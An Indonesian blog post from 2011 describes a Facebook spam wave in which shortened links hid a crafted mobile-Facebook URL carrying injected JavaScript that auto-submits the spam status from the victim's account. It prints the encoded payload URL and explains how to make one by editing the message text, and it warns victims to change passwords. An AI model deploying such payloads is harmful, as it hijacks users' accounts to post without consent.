cookieOptions = {link}; Spam via FB | Hafid Junaidi

Wednesday, March 30, 2011

Spam via FB

Kemarin cukup rame pembahasan url pendek pada status FB. Jebakan url pendek ini telah disalahgunakan oleh sebuah aplikasi (saya menduga aplikasi share) yang mirip kejahatan spam. Dengan mengklik link pada status salah satu korban spam, maka otomatik akun kita akan melakukan posting yang sama dengan status tersebut. Berikut ini beberapa liputan dan ulasan atas peristiwa yang saya ketahui kemarin tersebut, dan makasih buat mas awa yg cepet dapat informasinya.


Dari situs beria okezone dijelaskan paling tidak ada 3 macam jebakan shortcut url pada facebook kali ini yakni:
  1. Ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku
  2. Jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh
  3. Hiks..hiks..hiks..barusan mampir dari http://goo.gl/ds4vc KEREN bgt swearr.. buruan...mampir
Kebetulan capturenya saya sendiri memiliki 2 koraban yang sempat saya rekam berikut ini:


Dan menurut okezone sebaiknya kita segera ganti password bila telah menjadi korban tersebut.

Terus bagaimanakah cara kerja hal tersebut. Ulasannya cukup lengkap ada di blog mbak Nur Aini yang saya kutip sebagai berikut ini

Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E
Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya :(
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='

Dasar orang isenk :( Bukan virus, tapi ya mengubah satus kita sesuai denan message value di atas.
Update : ini juga

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='

untuk membuat ini cukup mudah
cukup kopi link diatas kemudian ganti bagian message.value.
contoh :
ini testing dari mamakey http://tinyurl.com/mamakey
maka tertulis :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’

Dan kesamaan hasil capture saya pastinya ada andil dari aplikasi share (coba lihat kedua capture di atas,sebelum link suka dan komentari "melalui share")

6 coment: